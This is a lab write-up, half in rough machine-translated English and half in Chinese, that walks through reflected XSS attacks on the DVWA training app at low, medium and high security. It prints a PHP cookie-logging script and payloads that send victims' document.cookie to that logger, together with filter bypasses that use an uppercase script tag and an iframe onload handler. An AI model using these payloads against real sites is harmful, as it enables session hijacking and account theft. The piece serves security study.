XXS reflective type (Reflected Cross Site Scripting)
Overview:
Cross-site attack is a malicious intruder purpose of inserting data in a remote WEB page HTML code, users think that the page is trustworthy, but when the browser to download the page, embedded script will be interpreted. Because HTML scripting language allows the use of a simple interaction, the intruder will insert a malicious HTML code in a page by technical means, such as record-keeping forum user information (Cookie), due Cookie save a complete user name and password information, the user security will suffer losses. This simple script such as Javascript can easily obtain user information: alert (document.cookie), it will pop up a message box that contains user information. Intruder using script will be able to send user information to record their own page, we get a slight analysis of user's sensitive information.
Cross-site scripting attacks Category:
1, Durable XSS, also known as storage-type XSS
2, XSS non-persistent type, also known as reflective XSS
3, DOM-XSS, DOM (Document Object Model)
Which type of lasting harmful, the other two did not appear at present seemingly wide range of automated means to harm, but it has been possible to maximize the type of non-persistent cross-site hazards, of course, the individual technical requirements are relatively high.
For non-persistent type of cross-site vulnerabilities, the vulnerability should still belong to the tasteless, but now harm on how to expand this vulnerability already have made progress, and it has been successfully exploited this vulnerability caused no small harm. Reflective XSS cast off the "chicken holes" hat is not far off.
Benpian study was conducted to DVWA four levels, such as during the interludes use hackbar found do not understand, you can look at the essays before, please leave a message treatise.
low:
Just listening to music, on the first song with inserted to try:
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1305364671&auto=1&height=66"></iframe>
Oh roar possible.
Now started:
1. Try alert
<script>alert("test")</script>
It can be found
2. Since you can, it would continue to get cookie
Write php file:
<?php $cookie=$_GET['cookie']; file_put_contents('get_low_dvwa_cookie.txt',$cookie); ?>
放到www文件夹下。
3.利用漏洞把cookie发送到刚刚的php文件中:
<script>document.location='http://127.0.0.1/get_low_dvwa_cookie.php?cookie='+document.cookie</script>
可以在输入框输入以上代码,也可以在hackbar里name="code...",注意用url encode
4.这时候可以看见获取了cookie并保存了文件
5.利用cookie进行登录【这部分暂时还没研究,挖坑!】
medium:
1.继续尝试alert,发现不可行
2.用<SCRIPT>进行尝试,发现ok
3.查看源码:
<?php header ("X-XSS-Protection: 0"); // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Get input $name = str_replace( '<script>', '', $_GET[ 'name' ] ); // Feedback for end user echo "<pre>Hello ${name}</pre>"; } ?>
可见<script>无效,因此我们用大写之后就ok了。XXS漏洞发现,之后跟low完全一样了
high:
1.用alert尝试:
不行,并且返回'>'
2.用大小写组合尝试
不行
3.但是用之前的那个网易云音乐尝试可行
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=1305364671&auto=1&height=66"></iframe>
4.因此可以判断,仅仅对script进行了处理!
用<iframe onload=alert("test")>测试,可行!
5.相当于利用iframe嵌入新的HTML
<iframe onload=document.location='http://127.0.0.1/get_low_dvwa_cookie.php?cookie='+document.cookie>
成功!
impossible:
// Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
暂时无解
后记:
关于合天网安那一课后面的三个问号的思考:
1)跨站漏洞的原理是什么?
没有对输入内容进行相应处理,如果像impossible那样处理,就能很好的保护了。
2)一般如何挖掘跨站漏洞?alert、iframe等等
3)现在如果你发现一个跨站漏洞你该如何利用?收集cookie,登录后台,已经挖坑,之后补一个实践操作的随笔记录。